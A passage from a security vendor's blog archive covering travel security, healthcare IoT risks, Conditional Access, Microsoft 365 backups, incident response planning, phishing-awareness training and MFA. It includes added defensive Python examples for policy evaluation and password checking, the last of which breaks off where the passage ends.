Ensure the use of strong, unique passwords for all accounts and enable multi-factor authentication (MFA) whenever possible. MFA adds an extra layer of security by requiring additional verification methods, such as a fingerprint or a one-time code sent to your mobile device.

Enable remote wipe capabilities in advance so that, if a device is lost or stolen, you can erase all its data remotely and prevent unauthorized access to sensitive information. Many organizations require this as a standard component of device setup.

Protecting Personal Information on the Go

Ensuring data security while traveling is a shared responsibility that requires vigilance and good habits. You can better protect personal and business data from potential threats by following the tips outlined here. Always use your own charging equipment, connect to secure networks through a VPN, use privacy screens and be cautious with sensitive information. By adopting these everyday security practices, you can enjoy peace of mind and focus on making the most of your travels. Stay safe and make digital security a top priority.

Data Security with a Trusted Partner

Protecting your personal or company data is always more effective when collaborating with a trusted partner. OneNeck offers a comprehensive approach to security services, ensuring the safety of your organization’s data in the cloud, on-premises, or within a hybrid environment. In addition, we provide practical security awareness training through extensive collaborations with trusted partners. This training educates users, effectively reducing risk and enhancing your organization’s security culture.

Ready to enhance your personal and organizational security? Contact us today to speak with a OneNeck security expert and take the first step toward a more secure future.


IoT in Healthcare: Security Risks and Patient Privacy
https://www.oneneck.com/blog/iot-in-healthcare-security-risks-and-patient-privacy/
Fri, 05 May 2023 16:59:51 +0000

The Internet of Things (IoT) has become a vital part of the healthcare industry, greatly impacting patient interaction and treatment. These connected devices collect and transmit patient data, allowing providers to monitor and manage patient health more effectively. However, the widespread adoption of IoT in healthcare exposes the industry to new risks, leading to a surge in security threats.

A 2023 SonicWall Cyber Threat Report shows that malware attacks against IoT in the medical field increased by 123% in 2022. The result is a significant threat to the privacy and safety of patient information.

Data Collection Through IoT in Healthcare

IoT devices are now nearly ubiquitous in the medical field, collecting patient information to improve diagnosis, treatment and overall care. Some of the most common types of data collected are:

  • Vital signs – IoT devices can continuously monitor patients’ heart rate, blood pressure, oxygen saturation and other vital signs, allowing healthcare providers to track real-time health status.
  • Activity levels – Wearables and sensors track patients’ movements and activities, providing insights into daily routines, exercise habits and sleep patterns.
  • Medical device data – Connected devices, such as insulin pumps and pacemakers, transmit data on their operation and status, enabling doctors to monitor performance and make necessary adjustments remotely.
  • Health history – Electronic health records (EHRs) store patients’ medical histories, including previous diagnoses, treatments and medications. Providers can access and update this information, improving care coordination and decreasing the risk of errors.

Healthcare IoT Security Risks and Protecting Patient Data

This significant increase in IoT malware attacks against the healthcare sector is particularly concerning when viewed in the context of a Cynerio 2022 State of Healthcare IoT Device Security report. This study revealed that 53% of hospital IoT devices have security vulnerabilities. Devices that fell into the most vulnerable category included IV pumps, VoIP phones, ultrasounds, medicine dispensers and IP cameras.

These weaknesses pose significant risks to both patients and healthcare providers. One primary risk is data breaches. Cybercriminals exploit IoT security vulnerabilities to gain access to sensitive patient data, leading to identity theft, fraud or other malicious activities.

Another risk is ransomware, where attackers can encrypt patient data and demand payments in exchange for release. These attacks can disrupt healthcare operations and in extreme cases potentially endanger patients’ lives.

Device manipulation is an additional security risk. Cyberattackers can compromise IoT devices, altering their functionality and putting patients in jeopardy of receiving incorrect treatments or experiencing adverse health events. This type of threat not only endangers patient safety but can also undermine faith in the healthcare system as a whole.

Safeguarding Patient Information with Security Best Practices

To safeguard patient data and maintain the advantages of IoT devices in healthcare, healthcare providers must take a proactive approach to implementing security measures. These include:

  • Periodically review IoT devices to identify potential vulnerabilities and prioritize security updates.
  • Encrypt patient data at rest and in transit to safeguard it against interception and unauthorized access.
  • Implement robust authentication methods, such as two-factor authentication, to protect IoT devices and ensure only authorized personnel access patient data.
  • Work closely with IoT device manufacturers and software vendors to promptly apply security patches and updates.
  • Ensure staff are well-versed in cybersecurity best practices; knowing the risks associated with IoT devices is crucial to creating a culture of security awareness.
  • Develop a comprehensive incident response plan so the organization can quickly identify, contain and remediate security breaches, minimizing their impact.
  • Comply with industry-specific regulations, such as HIPAA, which sets strict criteria for safeguarding patient data and protecting privacy.

Building a Secure Future for IoT in Healthcare: Partnering for Success

IoT devices have transformed the healthcare sector, providing real-time data that enables providers to manage patient health more efficiently and effectively. However, the growing reliance on connected devices presents unique challenges in ensuring the privacy and safety of patient information. By implementing robust security measures and maintaining a proactive approach to risk management, healthcare organizations can harness the benefits of IoT technology while safeguarding the trust and well-being of their patients.

Securing your IoT devices, while extremely important, is just one part of healthcare security. OneNeck recognizes the critical nature of securing patient data and is dedicated to offering holistic security services that adhere to the strictest compliance standards. By partnering with OneNeck, healthcare organizations can update legacy systems, implement securely architected cloud solutions, design and implement robust backup and DR services, develop incident response plans and ensure continuous alignment with regulatory requirements.

Ready to talk to a security expert? OneNeck is here to help. Contact us today to discuss how you can better protect sensitive patient data and maintain a secure and healthy environment.

Enhancing Cybersecurity with Conditional Access Policies
https://www.oneneck.com/blog/enhancing-security-with-conditional-access-policies/
Tue, 18 Apr 2023 18:48:54 +0000

As organizations embrace cloud services and remote work to fuel business growth, they must reassess conventional security measures to safeguard sensitive data, applications and resources. Microsoft Azure Active Directory (Azure AD) offers Conditional Access as a powerful security solution, allowing companies to control access through user identity, device, location and other contextual variables. This blog delves into Conditional Access policies, examines their significance for cybersecurity and discusses how they can enhance an organization’s security posture.

Understanding Conditional Access Policies

Conditional Access policies, at their most basic, are if-then statements: if a user wants to access a resource, then they must complete an action. Example: a remote employee wants to access the company’s intranet portal and is required to connect through a secure VPN.

Conditional Access policies are rules and conditions within Azure AD that help organizations manage access to resources, applications and data. They enable administrators to enforce granular access controls based on the context of a user’s access request, such as their device, location or risk level. The policies consist of several components: assignments specify the users, groups and applications to which a policy applies; conditions determine the circumstances for policy enforcement; and access controls define the actions taken when a policy is triggered.

[Figure: overview of Conditional Access policies. Source: Microsoft, “What is Conditional Access?”]

Once first-factor authentication is complete, the system applies Conditional Access policies. While Conditional Access does not serve as an organization’s first line of defense for scenarios like denial-of-service (DoS) attacks, it can utilize signals from these events to determine access. – Microsoft

Importance for Cybersecurity

Conditional Access improves an organization’s cybersecurity posture for several reasons:

  • Context-Aware Security – By considering user identity, device and location factors, organizations can make informed decisions about granting access and minimizing the risk of unauthorized access to sensitive data.
  • Adaptive Authentication – Implementing adaptive authentication mechanisms, like multi-factor authentication (MFA) when necessary, provides an additional security layer, especially during access to crucial resources, by adjusting authentication requirements based on contextual factors such as user behavior, device, location, time and other risk indicators.
  • Simplified Management – Azure AD’s centralized management console allows administrators to easily create, modify, and enforce organizational policies. This ability streamlines the process of managing access controls and reduces the likelihood of misconfigurations or security gaps.
  • Compliance Assurance – Organizations with strict compliance requirements can enforce specific access controls for regulated data and applications, thus meeting regulatory obligations and reducing the risk of fines or penalties.
  • Improved User Experience – Dynamically enforcing access controls based on context helps balance security and usability, allowing users to access resources seamlessly while protecting sensitive data and systems.

Implementing Conditional Access Policies in Your Organization

To effectively deploy Conditional Access policies within your organization, start by assessing security needs. Identifying critical applications, data and resources requiring enhanced security helps prioritize the policies to create and apply.

Next, establish access requirements for each sensitive resource, taking into account factors such as user roles, device compliance and geographic location. Create Conditional Access policies based on the defined requirements and test them in a controlled environment before deploying them across the organization. This approach ensures the policies function as intended and do not inadvertently disrupt access for legitimate users.

Regularly monitoring and adjusting your policies is essential to address new risks, changes in the threat landscape or evolving business requirements. Additionally, educating users is crucial. Inform them about the importance of Conditional Access policies and their role in resource protection. Encourage users to follow best practices for secure access, such as using MFA, keeping devices up-to-date and reporting suspicious activity.

Finally, integrate Conditional Access policies with other security solutions in your organization, such as threat intelligence, data loss prevention (DLP) and identity and access management (IAM) tools. This integration delivers a more comprehensive security approach.

Break the Glass Account

A “Break the Glass” account is an emergency account created within an organization’s IT environment to ensure continued access to critical systems and resources in case of unforeseen events. These emergencies could include a significant security incident or a misconfiguration in Conditional Access policies. These accounts must be created with highly privileged access and strong security controls.

The necessity of a Break the Glass account when using Conditional Access lies in the possibility of accidentally locking out administrators or users from essential resources, applications or services due to policy misconfigurations or unexpected changes in the organizational environment. In such situations, the Break the Glass account serves as a failsafe that allows designated personnel to regain access and rectify the issue, ensuring business continuity and minimal disruption. These accounts are also crucial to an effective incident response plan, enabling organizations to respond quickly to and recover from security breaches or other critical incidents.
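As an added example (not Microsoft’s or OneNeck’s code), the following Python models the if-then evaluation described in the policy components above: a sign-in context is checked against each policy’s assignments, conditions and grant controls, report-only policies are recorded rather than enforced (the controlled testing the deployment section recommends), and a pre-deployment check flags any enabled policy that fails to exclude the Break the Glass account. Field names loosely follow Microsoft Graph’s conditionalAccessPolicy shape; the evaluation logic is a simplified model, and all accounts, groups, applications and locations are constructed sample values.

```python
"""Toy evaluator for Conditional Access-style if-then policies.

Added example, not Azure AD or Microsoft code. Policy dicts loosely follow
the field names of Microsoft Graph conditionalAccessPolicy objects, but the
evaluation is a simplified model meant only to show how assignments,
conditions and grant controls combine, and why a Break the Glass account
must be excluded from every policy.
"""
from dataclasses import dataclass

BREAK_GLASS = "breakglass@example.com"  # constructed sample emergency account


@dataclass(frozen=True)
class SignIn:
    """Context of one access request, evaluated after first-factor auth."""
    user: str
    groups: frozenset
    app: str
    location: str  # named location such as "corp-hq", or "unknown"
    risk: str      # sign-in risk: "low", "medium" or "high"


def _user_in_scope(users, s):
    """Assignment check for users and groups; exclusions beat inclusions."""
    if s.user in users.get("excludeUsers", ()) or s.groups & set(users.get("excludeGroups", ())):
        return False
    inc = users.get("includeUsers", ())
    if "All" in inc or s.user in inc:
        return True
    return bool(s.groups & set(users.get("includeGroups", ())))


def _app_in_scope(apps, s):
    if s.app in apps.get("excludeApplications", ()):
        return False
    inc = apps.get("includeApplications", ())
    return "All" in inc or s.app in inc


def _conditions_met(cond, s):
    """Optional conditions; an absent condition imposes no restriction."""
    locs = cond.get("locations")
    if locs:
        if s.location in locs.get("excludeLocations", ()):
            return False
        inc = locs.get("includeLocations", ())
        if not ("All" in inc or s.location in inc):
            return False
    risks = cond.get("signInRiskLevels")
    return not risks or s.risk in risks


def evaluate(policies, s):
    """Return ("block" | "grant", grant controls still to satisfy such as
    "mfa", names of matching report-only policies that were not enforced)."""
    required, report_only, blocked = set(), [], False
    for p in policies:
        cond = p["conditions"]
        if p["state"] == "disabled":
            continue
        if not (_user_in_scope(cond["users"], s) and _app_in_scope(cond["applications"], s)
                and _conditions_met(cond, s)):
            continue
        if p["state"] == "enabledForReportingButNotEnforced":
            report_only.append(p["displayName"])  # logged for the pilot, never enforced
            continue
        controls = set(p["grantControls"]["builtInControls"])
        blocked = blocked or "block" in controls
        required |= controls - {"block"}
    return ("block", set(), report_only) if blocked else ("grant", required, report_only)


def unsafe_for_break_glass(policies, account=BREAK_GLASS):
    """Pre-deployment check: list every enabled policy that does not exclude
    the emergency account and so could lock it out if misconfigured."""
    return [p["displayName"] for p in policies if p["state"] != "disabled"
            and account not in p["conditions"]["users"].get("excludeUsers", ())]


# Constructed sample policy set; names and values are illustrative only.
POLICIES = [
    {"displayName": "Require MFA for all users", "state": "enabled",
     "conditions": {"users": {"includeUsers": ["All"], "excludeUsers": [BREAK_GLASS]},
                    "applications": {"includeApplications": ["All"]}},
     "grantControls": {"operator": "OR", "builtInControls": ["mfa"]}},
    {"displayName": "Block high-risk sign-ins", "state": "enabled",
     "conditions": {"users": {"includeUsers": ["All"], "excludeUsers": [BREAK_GLASS]},
                    "applications": {"includeApplications": ["All"]},
                    "signInRiskLevels": ["high"]},
     "grantControls": {"operator": "OR", "builtInControls": ["block"]}},
    {"displayName": "Require compliant device for Finance (pilot)",
     "state": "enabledForReportingButNotEnforced",
     "conditions": {"users": {"includeGroups": ["finance"], "excludeUsers": [BREAK_GLASS]},
                    "applications": {"includeApplications": ["erp"]},
                    "locations": {"includeLocations": ["All"], "excludeLocations": ["corp-hq"]}},
     "grantControls": {"operator": "OR", "builtInControls": ["compliantDevice"]}},
]

# The lock-out misconfiguration the text warns about: block "All" users with no exclusion.
BAD_POLICY = {"displayName": "Block all (misconfigured)", "state": "enabled",
              "conditions": {"users": {"includeUsers": ["All"]},
                             "applications": {"includeApplications": ["All"]}},
              "grantControls": {"operator": "OR", "builtInControls": ["block"]}}
```

Running `unsafe_for_break_glass` over a policy set before enabling it is the check that keeps the emergency account usable when a policy like `BAD_POLICY` slips through.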

Final Thoughts on Conditional Access Policies

Conditional Access is a basic and necessary component of modern cybersecurity strategies. By implementing context-aware access controls and adaptive authentication mechanisms, organizations can balance security and usability, allowing users to access resources when needed while protecting sensitive data and systems. As a fundamental aspect of access management, Conditional Access policies should be a priority for organizations looking to strengthen their security infrastructure.

While Conditional Access policies effectively help combat cyberattacks, they are only one aspect necessary to protect your data. OneNeck understands a holistic approach to security is essential for protecting your organization and its precious resources. As a skilled IT security services provider, we are here to help. Our team can assess your security posture, develop a protection strategy and help better leverage your security investments.

Contact us today to speak with a OneNeck security professional.

Are Microsoft 365 Data Backups Important?
https://www.oneneck.com/blog/are-microsoft-365-data-backups-important/
Tue, 11 Apr 2023 17:12:47 +0000

Why You Should Stay on Top of Microsoft 365 Data Backups

Businesses everywhere rely on Microsoft 365 for its cloud-based design and advanced collaboration. It is integral to many organizations’ services and workflows.

Sometimes, however, core tools like this can lull customers into a false sense of security. Over 40% of IT organizations say they no longer back up their Microsoft 365 data with third-party applications, even though Microsoft itself stresses the importance of Microsoft 365 data backups. This article discusses six important reasons organizations should always back up their Microsoft 365 data.

Do I need to back up Microsoft 365 data?

Backing up your Microsoft 365 data ensures that no matter what happens, you’ll always be able to recover your important files. Microsoft has guardrails in place for catastrophic events, such as your entire system crashing, but they don’t protect against accidental deletion or overwriting.

A regular backup schedule based on the frequency you create and update your documents and media will give you more control over your files — and give you significant peace of mind. Performing your own backups also allows for granular recovery, so you can restore a single file or email, rather than overwriting all data.

How often should I do a Microsoft 365 data backup?

Your backup schedule will depend on your organization’s compliance requirements, how often you access and make changes to your data, and how much downtime you can afford in the event of data loss. Downtime cost organizations an estimated $84,650 per hour in 2021. Organizations may need to perform data backups several times a day or as frequently as every five minutes to stay protected and in compliance.

Frequent backups give you up-to-date data recovery in the event of accidental deletions, as well as a recent restore point if a large part of your data is compromised by a ransomware attack.

Who is responsible for a Microsoft 365 data backup?

Microsoft 365 documentation states that Microsoft maintains the 365 application and infrastructure, while the customer is “…responsible for protecting the security of your data and identities, on-premises resources, and the cloud components you control.” That means you’re responsible for data backup and retention.

6 Important Reasons to do Microsoft 365 Data Backups

Here are six important reasons for regular Microsoft 365 data backups in your organization.

  • Microsoft 365 Data Backup Reason 1: Accidental Deletion
    We’ve all had that moment when we accidentally hit the “delete” button on a document — and then panicked. Regular backups make it simple to recover accidentally deleted files or emails so you don’t have to start an extensive project from scratch. This is especially important if you’ve accidentally deleted a Microsoft 365 user. Deleting a user account replicates automatically across the network, along with their personal SharePoint site and OneDrive data. Once the account is deleted, it’s gone from the entire network, and you can only get the user’s data back by restoring it from a backup.
  • Microsoft 365 Data Backup Reason 2: Internal Security Threats
    Threats from inside the organization may be intentional, such as a disgruntled employee, or unintentional, such as an employee who clicks on a link in a phishing email. In the event of data loss from internal threats, backups let you restore files necessary for daily operations.
  • Microsoft 365 Data Backup Reason 3: External Security Threats
    External threats include malware, viruses, and ransomware. These malicious programs can corrupt or delete data and applications, bringing business to a halt. The importance of a Microsoft 365 data backup is that you can restore a clean copy of your data and cut your recovery time.
  • Microsoft 365 Data Backup Reason 4: Legal Compliance
    Certain industries and locations require data to be stored for a specified amount of time. For example, the U.S. financial regulation Sarbanes-Oxley has specific data retention rules. Organizations that fail to meet these regulations can be subject to fines and penalties.
  • Microsoft 365 Data Backup Reason 5: Outages and Shutdowns
    Off-site data backups are extremely important when organizations experience an unplanned outage or shutdown due to hardware or software failure, or after a natural disaster. Terabytes of data that might have been lost can be restored quickly, getting everyone back on the task of building the business.
  • Microsoft 365 Data Backup Reason 6: Overall Business Continuity
    Business continuity is incredibly important for growing businesses with an expanding technology portfolio. Backups let you remain in control of your data and lower your downtime in the event of a data loss due to deletion, threats, or outages.

Does Microsoft 365 Recommend Backups?

Microsoft highly recommends backing up your 365 data. You don’t necessarily need to back up every file but prioritize content that can’t be easily replaced.

Microsoft does back up Microsoft 365 data every 12 hours and keeps it for 14 days. However, if you need to restore from their backup, it will be a full restore — everything will be overwritten. You can’t recover a single data point, like a file or an email.

Safeguard your Microsoft 365 Investment: Backup your Data

No one plans to lose files. But when you need to restore lost data, you’ll be glad you have a robust backup plan.

The importance of Microsoft 365 data backups cannot be overstated. That’s why OneNeck has partnered with Commvault to bring you Metallic® Microsoft 365 backup to help protect your documents, emails, and conversations.

Metallic backup offers powerful, enterprise-grade Microsoft 365 data protection across Exchange, Teams, OneDrive, and SharePoint data. With Metallic backup, you’ll get seamless SaaS data protection and hassle-free deployment, with 24/7 Microsoft expert support provided by OneNeck (with optional monitoring available).

Learn about how OneNeck and Commvault Metallic keep Microsoft 365 data safe from deletion and attack, with the simplicity of SaaS. Read about our Microsoft 365 backup solution here.

Incident Response Planning: Defend Against Cyberattacks
https://www.oneneck.com/blog/incident-response-planning-a-critical-part-in-defending-against-cyberattacks/
Tue, 28 Mar 2023 15:50:41 +0000

How Incident Response Planning Helps Contain Cyberattacks

Despite businesses pouring resources into cybersecurity, breaches aren’t going away — or even slowing down. In 2022 alone, companies reported a near-record 1802 breaches, affecting 422.1 million people.

Unfortunately, it’s not a matter of if your data will be breached, it’s a matter of when.

Incident response planning helps your organization prepare for security incidents by outlining objectives, processes, and evaluation criteria your team can follow every step of the way. Your organization’s custom plan will guide you through the aftermath of a breach, assist in recovery, and help you fix the vulnerabilities that led to the incident.

What is incident response planning?

Incident response planning means taking the time before a breach occurs to write down the actions you’ll take after it occurs. The Cybersecurity and Infrastructure Security Agency (CISA) describes an Incident Response Plan as a written strategy, approved by your organization’s senior leadership, that guides your organization before, during, and after a confirmed or suspected security breach.

Why do you need an incident response plan?

Once a breach happens, time is of the essence. You need to stop the attack, minimize the damage, and fix the problem quickly so that you can return to work. That’s why pre-planning is essential. By determining your incident response plan before a breach occurs, you’ll know which employees are responsible for which actions, when, and how they will complete them — speeding up your recovery time.

Having a written incident response plan and securing leadership approval tells your team exactly what to do and who will do it.

How do you write an incident response plan?

Starting your incident response plan with a blank page can be difficult. Instead, begin with the guidance the National Institute of Standards and Technology (NIST) issued for computer security incident response. The NIST Special Publication 800-61, Rev. 2 provides a framework for creating your own plan.

Along with NIST’s guidance, customize your incident response plan for your organization by assessing your:

  • assets and their level of risk
  • priorities
  • potential vulnerabilities
  • communication methods
  • incident response team members
  • distribution of responsibilities

And, of course, once you write your plan, you’ll need to train your team members so they can effectively communicate and mitigate when the next incident occurs.

The 6 Incident Response Phases

At a minimum, your plan should cover these phases of incident response and recovery:

  • Incident Response Planning Phase 1: Prepare
    During the first phase of incident response, ensure that your employees understand their roles and the steps they must take to respond. Practice your response procedures with exercises designed to simulate a breach. You’ll also use this phase to determine how you’ll identify breaches through testing, logs, alerts, or other procedures.
  • Incident Response Planning Phase 2: Identify
    You can receive an immediate alert that an attack may be taking place by implementing a monitoring tool or partnering with an MDR provider. You may also be notified through communication from another organization, law enforcement, or a customer. Once your team has evaluated the alert and determined that an attack is taking place, you’ll kick off the remainder of the incident response phases.
  • Incident Response Planning Phase 3: Control and Contain
    You know you have a breach; now it’s time to do something about it. Prevent further damage by isolating the network segment or infected servers. Document exactly what happened and the extent of the damage. If possible, preserve forensic data so you can analyze it in the Review phase.
  • Incident Response Planning Phase 4: Resolve
    Fix the vulnerability that caused the breach by removing malware, hardening and patching systems, and applying software updates.
  • Incident Response Planning Phase 5: Recover
    Return the isolated systems to regular operation and restore normal business processes.
  • Incident Response Planning Phase 6: Review
    Gather the incident documentation and the forensic evidence you preserved for the incident response team. Analyze the breach and the team’s response, and discuss the lessons learned from the process. Revise your incident response plan based on what worked and what didn’t so you’re fully prepared for the next incident.

Protect Your Network with Incident Response Planning from OneNeck

Incident response planning can make the difference between a quick recovery from a data breach and a long, painful one. That’s why OneNeck’s security experts can work with you to prepare an incident response plan and recover from breaches faster — so you can get back to business.

OneNeck has your back. Read more about our incident response services here.

Simulated Phishing Campaigns Can Improve Employees Awareness
https://www.oneneck.com/blog/how-simulated-phishing-campaigns-can-improve-cybersecurity-awareness/
Mon, 27 Mar 2023 20:00:20 +0000

Anyone who watched TV in the 90s will undoubtedly remember the NBC PSAs with the catchy jingle, “The more you know…”. It was sage advice then, and in today’s modern technological world, where cybersecurity is paramount, it still holds true. As such, businesses are increasingly embracing education related to cybersecurity. These organizations realize that there must be a focus on both external and internal threats, with increased awareness of the defenses that staff can employ.

Simulated Phishing Campaigns

Many businesses find that training services like those offered by OneNeck partner KnowBe4 are effective options to protect both data and personnel. One specific strategy is to simulate common threats that focus on the human element through phishing campaigns. This approach is particularly valuable since, according to Verizon’s 2022 Data Breach Investigations Report, 82% of data breaches involved a human component.

Through these simulated phishing attacks, end users can increase awareness of the methods used by attackers and the proper procedures to follow upon identifying such an attack.

Pushback Against Simulated Phishing Attacks

I recently listened to a podcast where a story was shared about an arguably ill-timed simulated phishing attack that a company ran against its employees. This particular business was in the process of rolling out organization-wide Multi-Factor Authentication. The simulated phishing attack – allegedly not coordinated on purpose to coincide with the MFA effort – implied that recipients needed to follow the email link to complete an MFA task. The podcaster – who works from home and has youngsters at home – was among those inside the company who fell victim to the simulated attack.

As they shared the events, they placed some blame for falling victim to the attack on outside distractions – notably balancing work and home life with littles. (Whether it’s children, pets, mobile devices, etc., we all know distraction far too intimately.) While admitting ultimate responsibility for falling victim to the simulation, they expressed significant frustration surrounding the timing. They decried the simulated attack as counter-productive when the organization’s goal was to get employees to buy in and support the MFA effort.

The Perfect Time

While I appreciate the expressed frustration, there are a few reasons that I believe the timing was not only excellent but should, in fact, be coordinated to align with company initiatives, such as the implementation of MFA.

  1. Attackers and bad actors don’t exactly work within a system of morals and ethics. They will exploit as many opportunities and weaknesses as they can find. Testing employees using guerrilla-style tactics theoretically serves to better educate and prepare users within the target audience.
  2. Multitasking (read: distraction) is an attacker’s best friend. Most of us have our attention divided by at least a few things at any given moment. When we make snap judgments or act without thought or careful review of what we are looking at, the odds of making a costly mistake skyrocket.
  3. Security in layers is critical for any organization. Educating users is a significant step in the right direction, but as we’ve seen, other factors come into play – and ultimately, we’re only human. IT organizations should employ overlapping solutions that prevent a distracted mistake or clever attack vector. Policy and procedure should be augmented by solutions like MFA, email filtering, and DNS filtering, to name a few. Layers of human and technical defenses together are key.

The More You Know with OneNeck and KnowBe4

Cyberthreats remain highly dynamic and ever-changing to adapt to defenses and human nature. Proactive measures such as education and coordinated campaigns help condition users on what to look for and can be highly effective tools. Simulated phishing campaigns stand out as a particularly successful method to train employees and raise awareness about the importance of cybersecurity. By simulating common threats that focus on the human element, end-users can become more accustomed to the methods used and the proper procedures to follow when discovering such attacks.

However, it’s important to note that educating users is just one step in reducing the likelihood of a cybersecurity breach. Investment in procedure/planning and defensive technical solutions is crucial in adequately protecting your business. Organizations should employ overlapping solutions that prevent a distracted mistake or clever attack vector.

In today’s fast-paced technological world, businesses must take cybersecurity seriously to avoid costly and damaging breaches. By incorporating education, training, and defensive technical solutions, organizations can significantly reduce the likelihood of a breach and protect their data and infrastructure.

Have questions about awareness, training or any aspect of cybersecurity? Contact us today to speak with a OneNeck security expert.

To MFA or Not to MFA – It’s Not Really a Question Anymore
https://www.oneneck.com/blog/to-mfa-or-not-to-mfa/
Mon, 20 Mar 2023 20:01:15 +0000

If you’ve ever used Microsoft 365, you’ve likely encountered multi-factor authentication (MFA). And if you’re like most, you probably find it a bit of a hassle. But the truth is that MFA is essential today, where cyberattacks are becoming increasingly common. In this blog, we’ll explore the importance of MFA and other steps to keep your accounts secure.

The Problem with Passwords

Passwords are the most common form of authentication. And while better than nothing, they’re not particularly secure. One of the most significant issues is their vulnerability to being compromised. Cyber-attackers employ various methods to obtain passwords, including phishing, keyloggers and dictionary attacks. Additionally, many users choose weak passwords, such as “123456,” “password,” or “guest,” making it simple for hackers to access accounts and steal sensitive information, putting users’ data at risk.

However, using passwords that are not easily guessable creates challenges in password retention. With numerous accounts and logins to remember, it can be challenging to track them all. As a result, people often reuse passwords across multiple accounts or write them down, leaving them vulnerable to security breaches.

Even with best practices in place, there are still risks. If an organization’s password database is compromised, all its users’ passwords are exposed. Several high-profile breaches have compromised millions of passwords and associated user IDs.

Better Passwords

Passwords are the first line of defense against unauthorized access to accounts. Therefore, it’s essential to make them as secure as possible. Complex passwords should include letters (upper and lowercase), numbers and symbols. By using a mix of characters, passwords become more challenging to crack.

According to Microsoft, passwords should be at least 14 characters long. Lengthier passwords make it harder for attackers to use brute-force methods to crack them. However, longer passwords can be harder to remember. One way to manage password length is to use passphrases. A passphrase is a sentence or combination of words that are easy to remember but difficult to guess.

Microsoft also recommends users change passwords periodically. Over time, passwords can become compromised. Organizations can reduce this risk by compelling users to change their passwords regularly. However, it’s important to note that changing too frequently can be counterproductive, creating weaker passwords or resulting in the user writing them down.

Finally, using a good password manager is helpful. Password managers can generate strong passwords, store them securely and automatically fill them in when needed. By employing a password manager, users do not have to remember every password while still keeping them safe from prying eyes.
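The guidance above (a 14-character minimum, a mix of character classes, passphrases, and rejection of guessable choices such as “123456” or “password”) can be turned into a checkable policy. The following is an added example written for this post and is not OneNeck’s or Microsoft’s code; the word list and the common-password block list are constructed stand-ins, and a real deployment would use a diceware-sized word list and a breached-password corpus. Passphrases are drawn with the `secrets` module so the choice is cryptographically random, and the entropy helper shows why the size of the word list matters more than the separator or capitalisation.

```python
import math
import secrets

# Constructed sample word list. A real passphrase generator loads a
# diceware-style list of several thousand words; this short list exists
# only so the example runs offline.
WORDLIST = [
    "anchor", "basil", "comet", "dune", "ember", "fjord", "glacier", "harbor",
    "ivory", "juniper", "kestrel", "lantern", "meadow", "nectar", "orchid",
    "pepper", "quartz", "ripple", "saffron", "tundra", "umber", "velvet",
    "walnut", "yonder", "zephyr",
]

# Constructed block list; in practice this is a breached/common-password corpus.
COMMON_PASSWORDS = {"123456", "password", "guest", "qwerty", "letmein"}

MIN_LENGTH = 14          # Microsoft's recommended minimum, as cited in the post
PASSPHRASE_LENGTH = 20   # at or above this length, class mixing is not required


def generate_passphrase(words=5, wordlist=WORDLIST, sep="-"):
    """Join words chosen uniformly at random with a CSPRNG (secrets, not random)."""
    return sep.join(secrets.choice(wordlist) for _ in range(words))


def passphrase_entropy_bits(words, wordlist_size):
    """Entropy of a uniformly chosen passphrase: words * log2(wordlist_size)."""
    return words * math.log2(wordlist_size)


def check_password(candidate):
    """Return the list of policy violations; an empty list means acceptable."""
    problems = []
    if len(candidate) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if candidate.lower() in COMMON_PASSWORDS:
        problems.append("appears on the common-password block list")
    classes = [
        any(c.islower() for c in candidate),
        any(c.isupper() for c in candidate),
        any(c.isdigit() for c in candidate),
        any(not c.isalnum() for c in candidate),
    ]
    # Long passphrases get their strength from length; shorter secrets must
    # mix at least three of the four character classes the post lists.
    if len(candidate) < PASSPHRASE_LENGTH and sum(classes) < 3:
        problems.append("fewer than three character classes (upper, lower, digit, symbol)")
    return problems


if __name__ == "__main__":
    phrase = generate_passphrase()
    print(phrase, check_password(phrase))
    print(f"{passphrase_entropy_bits(5, len(WORDLIST)):.1f} bits from this toy list")
    print(f"{passphrase_entropy_bits(5, 7776):.1f} bits from a 7776-word diceware list")
```

With the toy list a five-word passphrase carries under 25 bits of entropy, which is why the list size, not the word count alone, is the setting to get right; the same five words from a 7776-word list give roughly 64 bits.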

Better Accounts

Creating a “break-the-glass” account is a critical security measure every organization should consider. In a security breach, having an emergency account with the highest level of access can be a lifesaver. However, it’s crucial to remember using this account should only occur in extreme situations. Companies must store these account credentials securely and make them accessible only to a limited number of individuals.

Assigning roles and permissions to security groups is another worthwhile step in securing your accounts. Limiting resource access is vital so users can only access what they need to do their job. Separating admin and user accounts is also critical and reduces the risk of security breaches. Admin accounts should only be used when necessary and assigned on a limited basis.

When it comes to admin accounts, it’s essential to have control over them. Privileged Identity Management (PIM) and Privileged Access Management (PAM) are two solutions that can provide the necessary controls. PIM allows you to manage, monitor, and audit the use of privileged accounts and resources. PAM isolates privileged accounts to reduce the risk of stolen credentials and helps re-establish control over a compromised Active Directory environment by maintaining a separate bastion environment unaffected by malicious attacks.

MFA and Conditional Access Policies

Microsoft recommends using conditional access policies to enforce layers of control around admin and user accounts. These policies often require MFA and specify where, when, what, and how users can access specific resources. Additionally, they log the use of privileged accounts to track who is accessing what.

Conditional access policies provide an extra control layer for admin and user accounts, allowing organizations to set specific rules around access to resources based on conditions such as user location, the device used and even the time of day.

For example, you could create a conditional access policy that requires MFA for any user attempting to access your company’s financial data outside of regular business hours or from an unrecognized device. This example ensures only authorized individuals access critical financial information under specific circumstances that meet your organization’s security standards.
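To make the decision logic in that example concrete, here is an added model of a conditional access evaluator. It is example code written for this post, not Microsoft Entra’s implementation or OneNeck’s code: the `SignIn`, `Policy`, `evaluate` names and the policy set are hypothetical. Each policy is scoped to resources and optionally to groups, and applies when any of its trigger signals is true (outside business hours, unrecognized device, and so on); a blocking policy outranks one that only demands MFA, and an MFA requirement is satisfied once the second factor has already been presented in the session.

```python
from dataclasses import dataclass, field
from datetime import datetime, time
from typing import List, Optional, Set, Tuple


@dataclass
class SignIn:
    """Signals available when a sign-in is evaluated (constructed model)."""
    user: str
    groups: Set[str]
    resource: str
    location: str            # named location the source IP matched, or "unknown"
    device_known: bool       # registered / "remembered" device
    device_compliant: bool   # managed device currently reporting compliant
    when: datetime
    mfa_satisfied: bool = False


@dataclass
class Policy:
    name: str
    resources: Set[str]                    # apps in scope; "*" means every app
    control: str                           # "require_mfa" or "block"
    groups: Optional[Set[str]] = None      # None means every user
    triggers: Set[str] = field(default_factory=set)  # empty: applies to every scoped sign-in
    trusted_locations: Set[str] = field(default_factory=set)
    business_hours: Tuple[time, time] = (time(8, 0), time(18, 0))

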